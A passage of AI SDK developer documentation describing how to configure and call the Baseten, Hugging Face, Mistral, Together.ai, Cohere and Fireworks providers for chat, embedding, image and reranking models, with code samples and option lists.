modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync/v1',
});
// No modelId is needed because we specified modelURL
const model = baseten();
const { text } = await generateText({
model: model,
prompt: 'Say hello from a Baseten chat model!',
});
/predict Endpoints
/predict endpoints are currently NOT supported for chat models. You must use /sync/v1 endpoints for chat functionality.
Embedding Models
You can create models that call the Baseten embeddings API using the .embeddingModel() factory method. The Baseten provider uses the high-performance @basetenlabs/performance-client for optimal embedding performance.
import { createBaseten } from '@ai-sdk/baseten';
import { embed, embedMany } from 'ai';
const baseten = createBaseten({
modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync',
});
const embeddingModel = baseten.embeddingModel();
// Single embedding
const { embedding } = await embed({
model: embeddingModel,
value: 'sunny day at the beach',
});
// Batch embeddings
const { embeddings } = await embedMany({
model: embeddingModel,
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy mountain peak',
],
});
Endpoint Support for Embeddings
Supported:
- /sync endpoints (the Performance Client automatically adds /v1/embeddings)
- /sync/v1 endpoints (the /v1 suffix is automatically stripped before passing to the Performance Client)
Not Supported:
- /predict endpoints (not compatible with the Performance Client)
Performance Features
The embedding implementation includes:
- High-performance client: Uses @basetenlabs/performance-client for optimal performance
- Connection reuse: Performance Client is created once and reused for all requests
- Built-in retries: Automatic retry logic for failed requests
Error Handling
The Baseten provider includes built-in error handling for common API errors:
import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';
try {
const { text } = await generateText({
model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
prompt: 'Hello, world!',
});
} catch (error) {
console.error('Baseten API error:', error.message);
}
Common Error Scenarios
// Embeddings require a modelURL
try {
baseten.embeddingModel();
} catch (error) {
// Error: "No model URL provided for embeddings. Please set modelURL option for embeddings."
}
// /predict endpoints are not supported for chat models
try {
const baseten = createBaseten({
modelURL:
'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
});
baseten(); // This will throw an error
} catch (error) {
// Error: "Not supported. You must use a /sync/v1 endpoint for chat models."
}
// /sync/v1 endpoints are now supported for embeddings
const baseten = createBaseten({
modelURL:
'https://model-{MODEL_ID}.api.baseten.co/environments/production/sync/v1',
});
const embeddingModel = baseten.embeddingModel(); // This works fine!
// /predict endpoints are not supported for embeddings
try {
const baseten = createBaseten({
modelURL:
'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
});
baseten.embeddingModel(); // This will throw an error
} catch (error) {
// Error: "Not supported. You must use a /sync or /sync/v1 endpoint for embeddings."
}
// Image models are not supported
try {
baseten.imageModel('test-model');
} catch (error) {
// Error: NoSuchModelError for imageModel
}
title: Hugging Face
description: Learn how to use the Hugging Face provider.
Hugging Face Provider
The Hugging Face provider offers access to thousands of language models through Hugging Face Inference Providers, including models from Meta, DeepSeek, Qwen, and more.
API keys can be obtained from Hugging Face Settings.
Setup
The Hugging Face provider is available via the @ai-sdk/huggingface module. You can install it with:
pnpm add @ai-sdk/huggingface
Provider Instance
You can import the default provider instance huggingface from @ai-sdk/huggingface:
import { huggingface } from '@ai-sdk/huggingface';
For custom configuration, you can import createHuggingFace and create a provider instance with your settings:
import { createHuggingFace } from '@ai-sdk/huggingface';
const huggingface = createHuggingFace({
apiKey: process.env.HUGGINGFACE_API_KEY ?? '',
});
You can use the following optional settings to customize the Hugging Face provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://router.huggingface.co/v1.
-
apiKey string
API key that is being sent using the Authorization header. It defaults to the HUGGINGFACE_API_KEY environment variable. You can get your API key from Hugging Face Settings.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
const { text } = await generateText({
model: huggingface('deepseek-ai/DeepSeek-V3-0324'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .responses() or .languageModel() factory methods:
const model = huggingface.responses('deepseek-ai/DeepSeek-V3-0324');
// or
const model = huggingface.languageModel('moonshotai/Kimi-K2-Instruct');
Hugging Face language models can be used in the streamText function
(see AI SDK Core).
You can explore the latest and trending models with their capabilities, context size, throughput and pricing on the Hugging Face Inference Models page.
Provider Options
Hugging Face language models support provider-specific options that you can pass via providerOptions.huggingface:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
const { text } = await generateText({
model: huggingface('deepseek-ai/DeepSeek-R1'),
prompt: 'Explain the theory of relativity.',
providerOptions: {
huggingface: {
reasoningEffort: 'high',
instructions: 'Respond in a clear and educational manner.',
},
},
});
The following provider options are available:
-
metadata Record<string, string>
Additional metadata to include with the request.
-
instructions string
Instructions for the model. Can be used to provide additional context or guidance.
-
strictJsonSchema boolean
Whether to use strict JSON schema validation for structured outputs. Defaults to false.
-
reasoningEffort string
Controls the reasoning effort for reasoning models like DeepSeek-R1. Higher values result in more thorough reasoning.
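For example, strictJsonSchema pairs with structured outputs via the Output API used elsewhere in this guide; a minimal sketch, assuming the chosen model supports structured outputs:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
  model: huggingface('deepseek-ai/DeepSeek-V3-0324'),
  providerOptions: {
    huggingface: { strictJsonSchema: true },
  },
  output: Output.object({
    schema: z.object({
      city: z.string(),
      country: z.string(),
    }),
  }),
  prompt: 'Name a famous coastal city and its country.',
});
console.log(result.output);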
Reasoning Output
For reasoning models like deepseek-ai/DeepSeek-R1, you can control the reasoning effort and access the model's reasoning process in the response:
import { huggingface } from '@ai-sdk/huggingface';
import { streamText } from 'ai';
const result = streamText({
model: huggingface('deepseek-ai/DeepSeek-R1'),
prompt: 'How many r letters are in the word strawberry?',
providerOptions: {
huggingface: {
reasoningEffort: 'high',
},
},
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
console.log(`Reasoning: ${part.textDelta}`);
} else if (part.type === 'text-delta') {
process.stdout.write(part.textDelta);
}
}
For non-streaming calls with generateText, the reasoning content is available in the reasoning field of the response:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
const result = await generateText({
model: huggingface('deepseek-ai/DeepSeek-R1'),
prompt: 'What is 25 * 37?',
providerOptions: {
huggingface: {
reasoningEffort: 'medium',
},
},
});
console.log('Reasoning:', result.reasoning);
console.log('Answer:', result.text);
Image Input
For vision-capable models like Qwen/Qwen2.5-VL-7B-Instruct, you can pass images as part of the message content:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
import { readFileSync } from 'fs';
const result = await generateText({
model: huggingface('Qwen/Qwen2.5-VL-7B-Instruct'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe this image in detail.' },
{
type: 'image',
image: readFileSync('./image.png'),
},
],
},
],
});
You can also pass image URLs:
{
type: 'image',
image: 'https://example.com/image.png',
}
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| meta-llama/Llama-3.1-8B-Instruct | | | | |
| meta-llama/Llama-3.1-70B-Instruct | | | | |
| meta-llama/Llama-3.3-70B-Instruct | | | | |
| meta-llama/Llama-4-Maverick-17B-128E-Instruct | | | | |
| deepseek-ai/DeepSeek-V3.1 | | | | |
| deepseek-ai/DeepSeek-V3-0324 | | | | |
| deepseek-ai/DeepSeek-R1 | | | | |
| deepseek-ai/DeepSeek-R1-Distill-Llama-70B | | | | |
| Qwen/Qwen3-32B | | | | |
| Qwen/Qwen3-Coder-480B-A35B-Instruct | | | | |
| Qwen/Qwen2.5-VL-7B-Instruct | | | | |
| google/gemma-3-27b-it | | | | |
| moonshotai/Kimi-K2-Instruct | | | | |
title: Mistral AI
description: Learn how to use Mistral.
Mistral AI Provider
The Mistral AI provider contains language model support for the Mistral chat API.
Setup
The Mistral provider is available in the @ai-sdk/mistral module. You can install it with
pnpm add @ai-sdk/mistral
Provider Instance
You can import the default provider instance mistral from @ai-sdk/mistral:
import { mistral } from '@ai-sdk/mistral';
If you need a customized setup, you can import createMistral from @ai-sdk/mistral
and create a provider instance with your settings:
import { createMistral } from '@ai-sdk/mistral';
const mistral = createMistral({
// custom settings
});
You can use the following optional settings to customize the Mistral provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.mistral.ai/v1.
-
apiKey string
API key that is being sent using the Authorization header. It defaults to the MISTRAL_API_KEY environment variable.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Mistral chat API using a provider instance.
The first argument is the model id, e.g. mistral-large-latest.
Some Mistral chat models support tool calls.
const model = mistral('mistral-large-latest');
Mistral chat models also support additional model settings that are not part of the standard call settings.
You can pass them as an options argument and utilize MistralLanguageModelOptions for typing:
import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
const model = mistral('mistral-large-latest');
await generateText({
model,
providerOptions: {
mistral: {
safePrompt: true, // optional safety prompt injection
parallelToolCalls: false, // disable parallel tool calls (one tool per response)
} satisfies MistralLanguageModelOptions,
},
});
The following optional provider options are available for Mistral models:
-
safePrompt boolean
Whether to inject a safety prompt before all conversations. Defaults to false.
-
documentImageLimit number
Maximum number of images to process in a document.
-
documentPageLimit number
Maximum number of pages to process in a document.
-
strictJsonSchema boolean
Whether to use strict JSON schema validation for structured outputs. Only applies when a schema is provided and only sets the strict flag in addition to using Custom Structured Outputs, which is used by default if a schema is provided. Defaults to false.
-
structuredOutputs boolean
Whether to use structured outputs. When enabled, tool calls and object generation will be strict and follow the provided schema. Defaults to true.
-
parallelToolCalls boolean
Whether to enable parallel function calling during tool use. When set to false, the model will use at most one tool per response. Defaults to true.
Document OCR
Mistral chat models support document OCR for PDF files. You can optionally set image and page limits using the provider options.
import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const result = await generateText({
model: mistral('mistral-small-latest'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: new URL(
'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/ai.pdf?raw=true',
),
mediaType: 'application/pdf',
},
],
},
],
// optional settings:
providerOptions: {
mistral: {
documentImageLimit: 8,
documentPageLimit: 64,
} satisfies MistralLanguageModelOptions,
},
});
Reasoning Models
Mistral offers reasoning models that provide step-by-step thinking capabilities:
- magistral-small-2507: Smaller reasoning model for efficient step-by-step thinking
- magistral-medium-2507: More powerful reasoning model balancing performance and cost
These models return structured reasoning content that the AI SDK extracts automatically. The reasoning is available via the reasoningText property in the result:
import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const result = await generateText({
model: mistral('magistral-small-2507'),
prompt: 'What is 15 * 24?',
});
console.log('REASONING:', result.reasoningText);
// Output: "Let me calculate this step by step..."
console.log('ANSWER:', result.text);
// Output: "360"
The SDK automatically parses Mistral's native reasoning format and provides separate reasoningText and text properties in the result. No middleware is needed.
Configurable Reasoning
Some Mistral models support configurable reasoning, which you can control via the reasoningEffort option.
import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const result = await generateText({
model: mistral('mistral-small-latest'),
prompt: 'What is 15 * 24?',
providerOptions: {
mistral: {
reasoningEffort: 'high',
} satisfies MistralLanguageModelOptions,
},
});
console.log('REASONING:', result.reasoningText);
console.log('ANSWER:', result.text);
Mistral currently supports only 'high' and 'none' as effort levels.
Example
You can use Mistral language models to generate text with the generateText function:
import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const { text } = await generateText({
model: mistral('mistral-large-latest'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Mistral language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
Structured Outputs
Mistral chat models support structured outputs using JSON Schema. You can use generateText or streamText with Output
and Zod, Valibot, or raw JSON Schema. The SDK sends your schema via Mistral's response_format: { type: 'json_schema' }.
import { mistral } from '@ai-sdk/mistral';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: mistral('mistral-large-latest'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.string()),
instructions: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a simple pasta recipe.',
});
console.log(JSON.stringify(result.output, null, 2));
You can enable strict JSON Schema validation using a provider option:
import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: mistral('mistral-large-latest'),
providerOptions: {
mistral: {
strictJsonSchema: true,
} satisfies MistralLanguageModelOptions,
},
output: Output.object({
schema: z.object({
title: z.string(),
items: z.array(
z.object({ id: z.string(), qty: z.number().int().min(1) }),
),
}),
}),
prompt: 'Generate a small shopping list.',
});
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| pixtral-large-latest | | | | |
| mistral-large-latest | | | | |
| mistral-medium-latest | | | | |
| mistral-medium-2508 | | | | |
| mistral-medium-2505 | | | | |
| mistral-small-latest | | | | |
| magistral-small-2507 | | | | |
| magistral-medium-2507 | | | | |
| magistral-small-2506 | | | | |
| magistral-medium-2506 | | | | |
| ministral-3b-latest | | | | |
| ministral-8b-latest | | | | |
| pixtral-12b-2409 | | | | |
| open-mistral-7b | | | | |
| open-mixtral-8x7b | | | | |
| open-mixtral-8x22b | | | | |
You can create models that call the Mistral embeddings API
using the .embedding() factory method.
const model = mistral.embedding('mistral-embed');
You can use Mistral embedding models to generate embeddings with the embed function:
import { mistral } from '@ai-sdk/mistral';
import { embed } from 'ai';
const { embedding } = await embed({
model: mistral.embedding('mistral-embed'),
value: 'sunny day at the beach',
});
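Batch embedding works the same way with the embedMany function:
import { mistral } from '@ai-sdk/mistral';
import { embedMany } from 'ai';
const { embeddings } = await embedMany({
  model: mistral.embedding('mistral-embed'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});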
Model Capabilities
| Model | Default Dimensions |
|---|---|
| mistral-embed | 1024 |
title: Together.ai
description: Learn how to use Together.ai's models with the AI SDK.
Together.ai Provider
The Together.ai provider contains support for 200+ open-source models through the Together.ai API.
Setup
The Together.ai provider is available via the @ai-sdk/togetherai module. You can
install it with
pnpm add @ai-sdk/togetherai
Provider Instance
You can import the default provider instance togetherai from @ai-sdk/togetherai:
import { togetherai } from '@ai-sdk/togetherai';
If you need a customized setup, you can import createTogetherAI from @ai-sdk/togetherai
and create a provider instance with your settings:
import { createTogetherAI } from '@ai-sdk/togetherai';
const togetherai = createTogetherAI({
apiKey: process.env.TOGETHER_API_KEY ?? '',
});
You can use the following optional settings to customize the Together.ai provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.together.xyz/v1.
-
apiKey string
API key that is being sent using the Authorization header. It defaults to the TOGETHER_API_KEY environment variable.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create Together.ai models using a provider instance. The first argument is the model id, e.g. google/gemma-2-9b-it.
const model = togetherai('google/gemma-2-9b-it');
Reasoning Models
Together.ai exposes the thinking of deepseek-ai/DeepSeek-R1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { togetherai } from '@ai-sdk/togetherai';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: togetherai('deepseek-ai/DeepSeek-R1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
Example
You can use Together.ai language models to generate text with the generateText function:
import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';
const { text } = await generateText({
model: togetherai('meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Together.ai language models can also be used in the streamText function
(see AI SDK Core).
The Together.ai provider also supports completion models via togetherai.completionModel() and embedding models via togetherai.embeddingModel(), following the same pattern as the example code above; a completion model sketch follows below.
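A minimal sketch of the completion model (the model id is illustrative; any completion-capable Together.ai model should work):
import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';
const { text } = await generateText({
  model: togetherai.completionModel(
    'meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo',
  ),
  prompt: 'Once upon a time,',
});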
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| moonshotai/Kimi-K2.5 | | | | |
| Qwen/Qwen3.5-397B-A17B | | | | |
| MiniMaxAI/MiniMax-M2.5 | | | | |
| zai-org/GLM-5 | | | | |
| deepseek-ai/DeepSeek-V3.1 | | | | |
| openai/gpt-oss-120b | | | | |
| openai/gpt-oss-20b | | | | |
| meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8 | | | | |
Image Models
You can create Together.ai image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { togetherai } from '@ai-sdk/togetherai';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-dev'),
prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
});
You can pass optional provider-specific request parameters using the providerOptions argument.
import {
togetherai,
type TogetherAIImageModelOptions,
} from '@ai-sdk/togetherai';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-dev'),
prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
size: '512x512',
// Optional additional provider-specific request parameters
providerOptions: {
togetherai: {
steps: 40,
} satisfies TogetherAIImageModelOptions,
},
});
The following provider options are available:
-
steps number
Number of generation steps. Higher values can improve quality.
-
guidance number
Guidance scale for image generation.
-
negative_prompt string
Negative prompt to guide what to avoid.
-
disable_safety_checker boolean
Disable the safety checker for image generation. When true, the API will not reject images flagged as potentially NSFW. Not available for Flux Schnell Free and Flux Pro models.
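As a sketch combining several of these options (the values are illustrative):
import {
  togetherai,
  type TogetherAIImageModelOptions,
} from '@ai-sdk/togetherai';
import { generateImage } from 'ai';
const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-dev'),
  prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
  size: '1024x1024',
  providerOptions: {
    togetherai: {
      steps: 30,
      guidance: 3.5, // illustrative guidance scale
      negative_prompt: 'blurry, oversaturated',
    } satisfies TogetherAIImageModelOptions,
  },
});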
Image Editing
Together AI supports image editing through FLUX Kontext models. Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
import {
  togetherai,
  type TogetherAIImageModelOptions,
} from '@ai-sdk/togetherai';
import { generateImage } from 'ai';
import { readFileSync } from 'node:fs';
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-kontext-pro'),
prompt: {
text: 'Turn the cat into a golden retriever dog',
images: [imageBuffer],
},
size: '1024x1024',
providerOptions: {
togetherai: {
steps: 28,
} satisfies TogetherAIImageModelOptions,
},
});
Editing with URL Reference
You can also pass image URLs directly:
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-kontext-pro'),
prompt: {
text: 'Make the background a lush rainforest',
images: ['https://example.com/photo.png'],
},
size: '1024x1024',
providerOptions: {
togetherai: {
steps: 28,
} satisfies TogetherAIImageModelOptions,
},
});
Supported Image Editing Models
| Model | Description |
|---|---|
| black-forest-labs/FLUX.1-kontext-pro | Production quality, balanced speed |
| black-forest-labs/FLUX.1-kontext-max | Maximum image fidelity |
| black-forest-labs/FLUX.1-kontext-dev | Development and experimentation |
Model Capabilities
Together.ai image models support various image dimensions that vary by model. Common sizes include 512x512, 768x768, and 1024x1024, with some models supporting up to 1792x1792. The default size is 1024x1024.
| Available Models |
|---|
| stabilityai/stable-diffusion-xl-base-1.0 |
| black-forest-labs/FLUX.1-dev |
| black-forest-labs/FLUX.1-dev-lora |
| black-forest-labs/FLUX.1-schnell |
| black-forest-labs/FLUX.1-canny |
| black-forest-labs/FLUX.1-depth |
| black-forest-labs/FLUX.1-redux |
| black-forest-labs/FLUX.1.1-pro |
| black-forest-labs/FLUX.1-pro |
| black-forest-labs/FLUX.1-schnell-Free |
| black-forest-labs/FLUX.1-kontext-pro |
| black-forest-labs/FLUX.1-kontext-max |
| black-forest-labs/FLUX.1-kontext-dev |
Embedding Models
You can create Together.ai embedding models using the .embeddingModel() factory method.
For more on embedding models with the AI SDK see embed().
import { togetherai } from '@ai-sdk/togetherai';
import { embed } from 'ai';
const { embedding } = await embed({
model: togetherai.embeddingModel('togethercomputer/m2-bert-80M-2k-retrieval'),
value: 'sunny day at the beach',
});
Model Capabilities
| Model | Dimensions | Max Tokens |
|---|---|---|
| BAAI/bge-large-en-v1.5 | 1024 | 512 |
| Alibaba-NLP/gte-modernbert-base | 768 | 8192 |
| intfloat/multilingual-e5-large-instruct | 1024 | 514 |
Reranking Models
You can create Together.ai reranking models using the .reranking() factory method.
For more on reranking with the AI SDK see rerank().
import { togetherai } from '@ai-sdk/togetherai';
import { rerank } from 'ai';
const documents = [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
];
const { ranking } = await rerank({
model: togetherai.reranking('mixedbread-ai/Mxbai-Rerank-Large-V2'),
documents,
query: 'talk about rain',
topN: 2,
});
console.log(ranking);
// [
// { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
// { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]
Together.ai reranking models support additional provider options for object documents. You can specify which fields to use for ranking:
import {
togetherai,
type TogetherAIRerankingModelOptions,
} from '@ai-sdk/togetherai';
import { rerank } from 'ai';
const documents = [
{
from: 'Paul Doe',
subject: 'Follow-up',
text: 'We are happy to give you a discount of 20%.',
},
{
from: 'John McGill',
subject: 'Missing Info',
text: 'Here is the pricing from Oracle: $5000/month',
},
];
const { ranking } = await rerank({
model: togetherai.reranking('mixedbread-ai/Mxbai-Rerank-Large-V2'),
documents,
query: 'Which pricing did we get from Oracle?',
providerOptions: {
togetherai: {
rankFields: ['from', 'subject', 'text'], // Specify which fields to rank by
} satisfies TogetherAIRerankingModelOptions,
},
});
The following provider options are available:
- rankFields string[] - Array of field names to use for ranking when documents are JSON objects. If not specified, all fields are used.
Model Capabilities
| Model |
|---|
| mixedbread-ai/Mxbai-Rerank-Large-V2 |
title: Cohere description: Learn how to use the Cohere provider for the AI SDK.
Cohere Provider
The Cohere provider contains language and embedding model support for the Cohere chat API.
Setup
The Cohere provider is available in the @ai-sdk/cohere module. You can install it with
pnpm add @ai-sdk/cohere
Provider Instance
You can import the default provider instance cohere from @ai-sdk/cohere:
import { cohere } from '@ai-sdk/cohere';
If you need a customized setup, you can import createCohere from @ai-sdk/cohere
and create a provider instance with your settings:
import { createCohere } from '@ai-sdk/cohere';
const cohere = createCohere({
// custom settings
});
You can use the following optional settings to customize the Cohere provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.cohere.com/v2.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the COHERE_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- generateId () => string - Optional function to generate unique IDs for each request. Defaults to the SDK's built-in ID generator.
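For instance, a customized instance might look like the following sketch (all values are placeholders):
import { createCohere } from '@ai-sdk/cohere';

const cohere = createCohere({
  baseURL: 'https://my-proxy.example.com/v2', // placeholder proxy URL
  apiKey: process.env.COHERE_API_KEY ?? '',
  headers: { 'x-example-header': 'docs' }, // placeholder header
  generateId: () => crypto.randomUUID(), // custom request IDs
});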
Language Models
You can create models that call the Cohere chat API using a provider instance.
The first argument is the model id, e.g. command-r-plus.
Some Cohere chat models support tool calls.
const model = cohere('command-r-plus');
Example
You can use Cohere language models to generate text with the generateText function:
import { cohere } from '@ai-sdk/cohere';
import { generateText } from 'ai';
const { text } = await generateText({
model: cohere('command-r-plus'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Cohere language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
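For example, a minimal streaming sketch:
import { cohere } from '@ai-sdk/cohere';
import { streamText } from 'ai';

const result = streamText({
  model: cohere('command-r-plus'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

// Print the response incrementally as it arrives.
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}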
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| command-a-03-2025 | | | | |
| command-a-reasoning-08-2025 | | | | |
| command-r7b-12-2024 | | | | |
| command-r-plus-04-2024 | | | | |
| command-r-plus | | | | |
| command-r-08-2024 | | | | |
| command-r-03-2024 | | | | |
| command-r | | | | |
| command | | | | |
| command-nightly | | | | |
| command-light | | | | |
| command-light-nightly | | | | |
Reasoning
Cohere has introduced reasoning with the command-a-reasoning-08-2025 model. You can learn more at https://docs.cohere.com/docs/reasoning.
import { cohere, type CohereLanguageModelOptions } from '@ai-sdk/cohere';
import { generateText } from 'ai';
async function main() {
const { text, reasoning } = await generateText({
model: cohere('command-a-reasoning-08-2025'),
prompt:
"Alice has 3 brothers and she also has 2 sisters. How many sisters does Alice's brother have?",
// optional: reasoning options
providerOptions: {
cohere: {
thinking: {
type: 'enabled',
tokenBudget: 100,
},
} satisfies CohereLanguageModelOptions,
},
});
console.log(reasoning);
console.log(text);
}
main().catch(console.error);
Embedding Models
You can create models that call the Cohere embed API
using the .embedding() factory method.
const model = cohere.embedding('embed-english-v3.0');
You can use Cohere embedding models to generate embeddings with the embed function:
import { cohere, type CohereEmbeddingModelOptions } from '@ai-sdk/cohere';
import { embed } from 'ai';
const { embedding } = await embed({
model: cohere.embedding('embed-english-v3.0'),
value: 'sunny day at the beach',
providerOptions: {
cohere: {
inputType: 'search_document',
} satisfies CohereEmbeddingModelOptions,
},
});
Cohere embedding models support additional provider options that can be passed via providerOptions.cohere:
import { cohere, type CohereEmbeddingModelOptions } from '@ai-sdk/cohere';
import { embed } from 'ai';
const { embedding } = await embed({
model: cohere.embedding('embed-english-v3.0'),
value: 'sunny day at the beach',
providerOptions: {
cohere: {
inputType: 'search_document',
truncate: 'END',
} satisfies CohereEmbeddingModelOptions,
},
});
The following provider options are available:
- inputType 'search_document' | 'search_query' | 'classification' | 'clustering' - Specifies the type of input passed to the model. Default is search_query.
  - search_document: Used for embeddings stored in a vector database for search use-cases.
  - search_query: Used for embeddings of search queries run against a vector DB to find relevant documents.
  - classification: Used for embeddings passed through a text classifier.
  - clustering: Used for embeddings run through a clustering algorithm.
- truncate 'NONE' | 'START' | 'END' - Specifies how the API will handle inputs longer than the maximum token length. Default is END.
  - NONE: If the input exceeds the maximum input token length, an error is returned.
  - START: Discards the start of the input until the remaining input is exactly the maximum input token length for the model.
  - END: Discards the end of the input until the remaining input is exactly the maximum input token length for the model.
Model Capabilities
| Model | Embedding Dimensions |
|---|---|
| embed-english-v3.0 | 1024 |
| embed-multilingual-v3.0 | 1024 |
| embed-english-light-v3.0 | 384 |
| embed-multilingual-light-v3.0 | 384 |
| embed-english-v2.0 | 4096 |
| embed-english-light-v2.0 | 1024 |
| embed-multilingual-v2.0 | 768 |
Reranking Models
You can create models that call the Cohere rerank API
using the .reranking() factory method.
const model = cohere.reranking('rerank-v3.5');
You can use Cohere reranking models to rerank documents with the rerank function:
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const documents = [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
];
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents,
query: 'talk about rain',
topN: 2,
});
console.log(ranking);
// [
// { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
// { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]
Cohere reranking models support additional provider options that can be passed via providerOptions.cohere:
import { cohere, type CohereRerankingModelOptions } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
providerOptions: {
cohere: {
maxTokensPerDoc: 1000,
priority: 1,
} satisfies CohereRerankingModelOptions,
},
});
The following provider options are available:
- maxTokensPerDoc number - Maximum number of tokens per document. Default is 4096.
- priority number - Priority of the request. Default is 0.
Model Capabilities
| Model |
|---|
| rerank-v3.5 |
| rerank-english-v3.0 |
| rerank-multilingual-v3.0 |
title: Fireworks description: Learn how to use Fireworks models with the AI SDK.
Fireworks Provider
Fireworks is a platform for running and testing LLMs through their API.
Setup
The Fireworks provider is available via the @ai-sdk/fireworks module. You can install it with
pnpm add @ai-sdk/fireworks
Provider Instance
You can import the default provider instance fireworks from @ai-sdk/fireworks:
import { fireworks } from '@ai-sdk/fireworks';
If you need a customized setup, you can import createFireworks from @ai-sdk/fireworks
and create a provider instance with your settings:
import { createFireworks } from '@ai-sdk/fireworks';
const fireworks = createFireworks({
apiKey: process.env.FIREWORKS_API_KEY ?? '',
});
You can use the following optional settings to customize the Fireworks provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.fireworks.ai/inference/v1.
